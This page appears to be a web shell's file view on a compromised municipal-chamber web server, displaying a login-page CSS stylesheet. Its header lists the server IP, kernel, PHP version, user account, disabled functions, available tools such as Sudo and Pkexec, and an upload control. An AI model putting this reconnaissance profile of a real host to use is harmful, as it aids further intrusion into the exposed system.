| Server IP : 20.75.53.88 / Your IP : 216.73.217.72 [ Web Server : Apache System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29+esm15 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, Domains : 3 Domains MySQL : ON | cURL : OFF | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/portais/camarabeberibe/assets/css/ |
Upload File : |
body a {
color: red;
transition: 0.5s all;
-webkit-transition: 0.5s all;
-moz-transition: 0.5s all;
-o-transition: 0.5s all;
-ms-transition: 0.5s all;
text-decoration: none;
}
body a:hover {
text-decoration: none;
}
body a:focus, a:hover {
text-decoration: none;
}
input[type="button"], input[type="submit"] {
transition: 0.5s all;
-webkit-transition: 0.5s all;
-moz-transition: 0.5s all;
-o-transition: 0.5s all;
-ms-transition: 0.5s all;
}
h1, h2, h3, h4, h5, h6 {
margin: 0;
padding: 0;
font-family: 'Raleway', sans-serif;
color: #2d2f91;
}
p {
margin: 0;
font-family: 'Open Sans', sans-serif;
}
ul {
margin: 0;
padding: 0;
}
li {
list-style-type: none;
}
label {
margin: 0;
}
a:focus, a:hover {
text-decoration: none;
outline: none;
}
/*-- //Reset-Code --*/
body {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
/*background-image: url('../dist/img/tela_fundo.png');*/
background-color: white;
background-repeat: no-repeat;
background-attachment: fixed;
background-size: 100%;
}
.agile-login {
padding-top: 60px;
}
.wrapper {
width: 450px;
margin: auto;
text-align: center;
padding: 2% 0px;
background-color: white;
/*background-color: rgba(6, 5, 5, 0.45);*/
webkit-box-shadow: 10px 3px 66px -19px rgba(0, 0, 0, 0.75);
-moz-box-shadow: 10px 3px 66px -19px rgba(0, 0, 0, 0.75);
box-shadow: 10px 3px 66px -19px rgba(0, 0, 0, 0.75);
border-radius: 15px;
z-index: 99;
}
.w3ls-form {
display: inline-block;
width: 350px;
margin: auto;
text-align: left;
}
label, input[type="text"], input[type="submit"] {
display: block;
font-family: 'Open Sans', sans-serif;
}
input[type="text"] {
outline: 0;
padding: 12px 15px;
border-radius: 25px;
border: none;
/* background-color: rgba(31, 248, 255, 0.59); */
background-color: rgba(103, 120, 121, 0.24);
color: #000000;
width: 100%;
letter-spacing: 1px;
font-size: 15px;
font-weight: 600;
}
input[type="password"] {
outline: 0;
padding: 12px 15px;
border-radius: 25px;
border: none;
/* background-color: rgba(31, 248, 255, 0.59); */
background-color: rgba(103, 120, 121, 0.24);
color: #000000;
width: 100%;
letter-spacing: 1px;
font-size: 15px;
font-weight: 600;
}
.agile-login h1 {
text-align: center;
color: #fff;
margin-bottom: 2%;
font-size: 45px;
font-weight: 300;
letter-spacing: 5px;
text-transform: uppercase;
}
.wrapper h2 {
margin-bottom: 30px;
text-transform: uppercase;
font-size: 26px;
color: #2d2f91;
font-weight: 600;
letter-spacing: 2px;
}
a.pass {
font-size: 15px;
color: #efbb42;
font-family: 'Open Sans', sans-serif;
letter-spacing: 2px;
}
.w3ls-form a {
display: block;
text-align: right;
margin: 15px 0px;
}
label {
margin: 20px 0px 8px 15px;
font-size: 13px;
color: #2d2f91;
font-family: 'Open Sans', sans-serif;
text-transform: uppercase;
letter-spacing: 2px;
}
input[type="submit"] {
margin: 20px auto;
padding: 9px 60px;
border-radius: 25px;
font-size: 18px;
border: none;
background-color: transparent;
color: #2d2f91;
text-transform: uppercase;
outline: 0;
border: 1px solid #4f5d61;
cursor: pointer;
width: 100%;
letter-spacing: 1px;
}
input[type="submit"]:hover {
color: #000000;
background-color: transparent;
}
::-webkit-input-placeholder { /* Chrome/Opera/Safari */
color: #ccc6c6;
}
::-moz-placeholder { /* Firefox 19+ */
color: #ccc6c6;
}
:-ms-input-placeholder { /* IE 10+ */
color: #ccc6c6;
}
:-moz-placeholder { /* Firefox 18- */
color: #ccc6c6;
}
.agile-icons {
padding: 3% 0px;
background-color: transparent;
}
span.fa.fa-twitter:hover {
background-color: #00b6f1;
color: white;
font-size: 18px;
}
span.fa.fa-facebook:hover {
background-color: #3b5998;
color: white;
font-size: 18px;
}
span.fa.fa-instagram:hover {
background-color: #cb2027;
color: white;
font-size: 18px;
}
.agile-icons span.fa {
font-size: 18px;
margin: auto 15px;
color: #ffffff;
width: 32px;
height: 32px;
line-height: 32px;
border-radius: 50%;
background-color: rgb(167, 190, 191);
}
.copyright p {
text-align: center;
padding: 15px 0px;
color: white;
/* background-color: rgba(35, 30, 30, 0.43); */
margin-top: 4%;
letter-spacing: 2px;
font-size: 13px;
}
.copyright a {
color: #ffffff;
}
.copyright a:hover {
color: #2d2f91;
}
/* responsive */
@media screen and (max-width: 1024px) {
.copyright p {
margin-top: 0%;
}
}
@media screen and (max-width: 568px) {
.agile-login h1 {
font-size: 40px;
}
}
@media screen and (max-width: 480px) {
body {
background-position: center;
}
.agile-login {
padding-top: 35px;
}
.agile-login h1 {
font-size: 35px;
letter-spacing: 4px;
}
.wrapper h2 {
font-size: 26px;
}
.wrapper {
width: 370px;
}
.copyright p {
letter-spacing: 1px;
}
}
@media screen and (max-width: 414px) {
.agile-login h1 {
font-size: 30px;
letter-spacing: 3px;
margin-bottom: 6%;
}
.wrapper {
width: 320px;
}
.w3ls-form {
width: 300px;
}
.wrapper h2 {
font-size: 20px;
margin-bottom: 15px;
}
.copyright p {
padding: 10px 0px;
font-size: 14px;
margin-top: 6%;
}
}
@media screen and (max-width: 375px) {
.agile-login h1 {
font-size: 29px;
}
input[type="text"] {
width: 90%;
}
label {
margin: 20px 0px 5px 10px;
font-size: 13px;
color: #2d2f91;
}
.copyright p {
font-size: 13px;
}
}
@media screen and (max-width: 320px) {
.w3ls-form {
width: 270px;
}
.agile-login h1 {
font-size: 23px;
}
.wrapper {
width: 280px;
}
.wrapper h2 {
font-size: 18px;
margin-bottom: 10px;
}
input[type="submit"] {
margin: 10px auto;
padding: 8px 60px;
}
.agile-login {
padding-top: 30px;
}
label {
margin: 15px 0px 5px 10px;
}
.copyright p {
margin-top: 0%;
}
input[type="text"] {
padding: 10px 15px;
}
}
/* responsive */